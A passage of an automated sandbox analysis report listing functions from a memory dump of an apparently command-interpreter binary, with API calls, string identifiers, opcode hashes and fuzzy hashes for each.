                                                                                          Function 00007FF6A0E7CD90 Relevance: 2.5, APIs: 2, Instructions: 30memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6A0E7B9A1,?,?,?,?,00007FF6A0E7D81A), ref: 00007FF6A0E7CDA6
                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6A0E7B9A1,?,?,?,?,00007FF6A0E7D81A), ref: 00007FF6A0E7CDBD
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Heap$AllocProcess
                                                                                          • String ID:
                                                                                          • API String ID: 1617791916-0
                                                                                          • Opcode ID: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
                                                                                          • Instruction ID: ae6706625a2695a46215ad74246964e1af96132dc94ca0402fa9ed17e386f87d
                                                                                          • Opcode Fuzzy Hash: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
                                                                                          • Instruction Fuzzy Hash: CAF08132E1AB4392EB548B15F840178B7A0FB8AB00B589035D90E83355CF3CE485D700
                                                                                          Function 00007FF6A0E84C1C Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: exit
                                                                                          • String ID:
                                                                                          • API String ID: 2483651598-0
                                                                                          • Opcode ID: e255d2af7c18615348d8cf7a7b788cdf459202c7b5a34beac69f38e8db5c085f
                                                                                          • Instruction ID: a5faabaf9eb885b14219be0b802b51cd4044051a8ec45e5ae1fcbda3fcf4e747
                                                                                          • Opcode Fuzzy Hash: e255d2af7c18615348d8cf7a7b788cdf459202c7b5a34beac69f38e8db5c085f
                                                                                          • Instruction Fuzzy Hash: 10C08C70B0A647ABFB2C6B71289103D99E9BF4D302F05683CCA0BC1382EE2CD80C9200
                                                                                          Function 00007FF6A0E85508 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: DefaultUser
                                                                                          • String ID:
                                                                                          • API String ID: 3358694519-0
                                                                                          • Opcode ID: 5d8fc4fa8e665926eb49570ec356dc21582dec5ebc006b351cd7b5a4e2c943bd
                                                                                          • Instruction ID: 05a93d95d120a1b8f572d343fdd5040c973b049c9a3fe1b9f0d18eb7b4895aea
                                                                                          • Opcode Fuzzy Hash: 5d8fc4fa8e665926eb49570ec356dc21582dec5ebc006b351cd7b5a4e2c943bd
                                                                                          • Instruction Fuzzy Hash: 44E02BF3D0A253ABF5582F4160413F41953FB7A783FC44031D70D817C04D2D28457208
                                                                                          Function 00007FF6A0E82E44 Relevance: 1.3, APIs: 1, Instructions: 29COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: memset
                                                                                          • String ID:
                                                                                          • API String ID: 2221118986-0
                                                                                          • Opcode ID: f77ccc38f2f42b08cf4ed255524ec50c837bf5ddba9254f495b6a2bfe7d154bb
                                                                                          • Instruction ID: 5de4b03ae947725fb72120dae8bd24d2aabe88b2246520cbd8cfe5316431820a
                                                                                          • Opcode Fuzzy Hash: f77ccc38f2f42b08cf4ed255524ec50c837bf5ddba9254f495b6a2bfe7d154bb
                                                                                          • Instruction Fuzzy Hash: FDF0E231B0A78351FA408B56B9401296290AF88BF0F088334EF7D87BC9EE3CD4528300

                                                                                          Non-executed Functions

                                                                                          Function 00007FF6A0E75B70 Relevance: 158.5, APIs: 70, Strings: 20, Instructions: 1037memorythreadprocessCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcsicmp$AttributeHeapProcThread$ErrorHandleLast$ListProcessmemset$towupper$CloseConsoleCtrlDeleteFreeHandlerInitializeUpdateiswspacewcschr$AllocCreateInfoStartup_wcsnicmp
                                                                                          • String ID: $ /K $ /K %s$"%s"$.LNK$ABOVENORMAL$AFFINITY$BELOWNORMAL$COMSPEC$HIGH$LOW$MAX$MIN$NEWWINDOW$NODE$NORMAL$REALTIME$SEPARATE$SHARED$WAIT
                                                                                          • API String ID: 1388555566-2647954630
                                                                                          • Opcode ID: dd5574a000e659851fdbf238c5bb4c561f059835a701a2d9c9248c4e2a7a7e86
                                                                                          • Instruction ID: a0e178cccd3a4c68cf411362bd5ff825c93fa5139267cbb441382297e36ae18e
                                                                                          • Opcode Fuzzy Hash: dd5574a000e659851fdbf238c5bb4c561f059835a701a2d9c9248c4e2a7a7e86
                                                                                          • Instruction Fuzzy Hash: A0A2B672E0AB83A6EB148B35E4142B9BBA1FF89785F548135DA0E87795DF3CE444E700
                                                                                          Function 00007FF6A0E7E680 Relevance: 79.4, APIs: 39, Strings: 6, Instructions: 696COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: wcschr$FileSize_get_osfhandle_wcsnicmpiswspace
                                                                                          • String ID: &<|>$+: $:$:EOF$=,;$^
                                                                                          • API String ID: 511550188-726566285
                                                                                          • Opcode ID: 348cd75d81f2e43b90b1fdde602cc3fa7c7e8620821296db2d6a5e23a835ab51
                                                                                          • Instruction ID: 3b8722ec53b3773bb7eb41ee933917ee8dd083b2390ff1c482d3a5772aa59159
                                                                                          • Opcode Fuzzy Hash: 348cd75d81f2e43b90b1fdde602cc3fa7c7e8620821296db2d6a5e23a835ab51
                                                                                          • Instruction Fuzzy Hash: D152C532E0E693A6FB648B24A410279ABE1FB8E745F548135DA4EC3795DF3CE845E700
                                                                                          Function 00007FF6A0E79E50 Relevance: 67.3, APIs: 32, Strings: 6, Instructions: 812COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcsnicmp$wcschr$wcstol
                                                                                          • String ID: delims=$eol=$skip=$tokens=$useback$usebackq
                                                                                          • API String ID: 1738779099-3004636944
                                                                                          • Opcode ID: ed9b4971405935f9cd70a6a1a32585b3fb37949906c07fe23bc6612a814efbe7
                                                                                          • Instruction ID: ffade8c607eda87d578697be41462cdc5c260c69e76e82497da86d22e8d70204
                                                                                          • Opcode Fuzzy Hash: ed9b4971405935f9cd70a6a1a32585b3fb37949906c07fe23bc6612a814efbe7
                                                                                          • Instruction Fuzzy Hash: 1A729E32F0A643AAEB248F65D4447BD37B1FB84788F488135DE0D97795EE3CA825A300
                                                                                          Function 00007FF6A0E97F00 Relevance: 61.6, APIs: 28, Strings: 7, Instructions: 341memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6A0E97F44
                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF6A0E97F5C
                                                                                          • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6A0E97F9E
                                                                                          • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6A0E97FFF
                                                                                          • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6A0E98020
                                                                                          • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6A0E98036
                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6A0E98061
                                                                                          • RtlFreeHeap.NTDLL ref: 00007FF6A0E98075
                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6A0E980D6
                                                                                          • RtlFreeHeap.NTDLL ref: 00007FF6A0E980EA
                                                                                          • _wcsnicmp.MSVCRT ref: 00007FF6A0E98177
                                                                                          • _wcsnicmp.MSVCRT ref: 00007FF6A0E9819A
                                                                                          • _wcsnicmp.MSVCRT ref: 00007FF6A0E981BD
                                                                                          • _wcsnicmp.MSVCRT ref: 00007FF6A0E981DC
                                                                                          • _wcsnicmp.MSVCRT ref: 00007FF6A0E981FB
                                                                                          • _wcsnicmp.MSVCRT ref: 00007FF6A0E9821A
                                                                                          • _wcsnicmp.MSVCRT ref: 00007FF6A0E98239
                                                                                          • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6A0E98291
                                                                                          • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6A0E982D7
                                                                                          • FillConsoleOutputCharacterW.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6A0E982FB
                                                                                          • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6A0E9831A
                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6A0E98364
                                                                                          • RtlFreeHeap.NTDLL ref: 00007FF6A0E98378
                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6A0E9839A
                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6A0E983AE
                                                                                          • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6A0E983E6
                                                                                          • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6A0E98403
                                                                                          • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6A0E98418
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Heap$Console_wcsnicmp$LockProcessShared$Free$AcquireBufferInfoReadReleaseScreen$AllocCharacterCursorFillHandleOutputPositionWrite_get_osfhandle
                                                                                          • String ID: cd $chdir $md $mkdir $pushd $rd $rmdir
                                                                                          • API String ID: 3637805771-3100821235
                                                                                          • Opcode ID: d74073052f036fb2306f86013512fc5dd735d89bb1ebe6582b1f79b80fa44d3e
                                                                                          • Instruction ID: 667d13eb1a9a7d81c2d73f7e9bab80e0b4037ced7dca74167b9658d734861781
                                                                                          • Opcode Fuzzy Hash: d74073052f036fb2306f86013512fc5dd735d89bb1ebe6582b1f79b80fa44d3e
                                                                                          • Instruction Fuzzy Hash: 79E1A272A0A693AAE7108F65E900179BBB1FB4DBD5B549231DD1E937A0DF3CA405E700
                                                                                          Function 00007FF6A0E73F90 Relevance: 60.8, APIs: 32, Strings: 2, Instructions: 1302fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Filememset$Attributes$ErrorLast$AllocCopyFindFirstVirtualwcschr
                                                                                          • String ID: %s$%s
                                                                                          • API String ID: 3623545644-3518022669
                                                                                          • Opcode ID: 38a5e45e38bfe07a57e0768e9fc214b37c1ae7ae59c984c6791102e86402e929
                                                                                          • Instruction ID: bc7e6bfab37dbfb597191b44b6f76a5def6967f1dfebae11f2a6e3f16d53e6ef
                                                                                          • Opcode Fuzzy Hash: 38a5e45e38bfe07a57e0768e9fc214b37c1ae7ae59c984c6791102e86402e929
                                                                                          • Instruction Fuzzy Hash: 11D2B472A0A783AAEB649F65D8502BDB7A1FB85784F104139DA0EC7B95DF3CE444E700
                                                                                          Function 00007FF6A0E72C48 Relevance: 60.1, APIs: 32, Strings: 2, Instructions: 633COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Console$memset$BufferMode$FullInfoNamePathScreen$CharacterCursorErrorFillFlushHandleInputLastOutputPositionWrite_getch_wcsicmpwcschrwcsrchr
                                                                                          • String ID: %9d$%s
                                                                                          • API String ID: 4286035211-3662383364
                                                                                          • Opcode ID: 136cc2a75b229116dd3e54a838434d9f07a228baa8cef88b1cce83190b594ef6
                                                                                          • Instruction ID: 4df2a340cb23fe578e42a2abcbbf27492bd31e99283647f77baab3837624f2a2
                                                                                          • Opcode Fuzzy Hash: 136cc2a75b229116dd3e54a838434d9f07a228baa8cef88b1cce83190b594ef6
                                                                                          • Instruction Fuzzy Hash: 5852C432B0AB83AAEB648F64D8502F9B7A0FF89799F404135DA0E87795DF3CD5449700
                                                                                          Function 00007FF6A0E818D4 Relevance: 42.6, APIs: 23, Strings: 1, Instructions: 644COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: wcsrchr$towlower
                                                                                          • String ID: fdpnxsatz
                                                                                          • API String ID: 3267374428-1106894203
                                                                                          • Opcode ID: 08d373f91018fc1fdffc976f2f3080daf4c294e0971252b1bba390c6112b5b20
                                                                                          • Instruction ID: ad7e5a4361a38ba4774aa0030b0233fc9234975b3d68acbb52232b2fb42c0112
                                                                                          • Opcode Fuzzy Hash: 08d373f91018fc1fdffc976f2f3080daf4c294e0971252b1bba390c6112b5b20
                                                                                          • Instruction Fuzzy Hash: 1F42E232B0AA83A6EB648F2595102B967E5FF45B94F148135DE0E97BC4DF3CE849A340
                                                                                          Function 00007FF6A0E77650 Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 461fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: File_get_osfhandle$memset$PathPointerReadSearchSizeType_wcsnicmpwcsrchr
                                                                                          • String ID: DPATH
                                                                                          • API String ID: 95024817-2010427443
                                                                                          • Opcode ID: 453260b4bb9689c464f7ee8a055c2a7ad3bf1f5e95a95e4c5e119382bbbdb6fa
                                                                                          • Instruction ID: d9d7fc692ffa04034d1d10b1fbd3695251ecf20785a63fb2a291af9153d151bf
                                                                                          • Opcode Fuzzy Hash: 453260b4bb9689c464f7ee8a055c2a7ad3bf1f5e95a95e4c5e119382bbbdb6fa
                                                                                          • Instruction Fuzzy Hash: C612E672A0A683A7E7649F25A44057AF7E1FF89B90F444235EA4E97794DF3CE400EB40
                                                                                          Function 00007FF6A0E75240 Relevance: 33.8, APIs: 14, Strings: 5, Instructions: 503COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: [...]$ [..]$ [.]$...$:
                                                                                          • API String ID: 0-1980097535
                                                                                          • Opcode ID: faea0ce3264b24e9714e5e9f50a61001846328088e1bd545bd05d4c9d0f2d55d
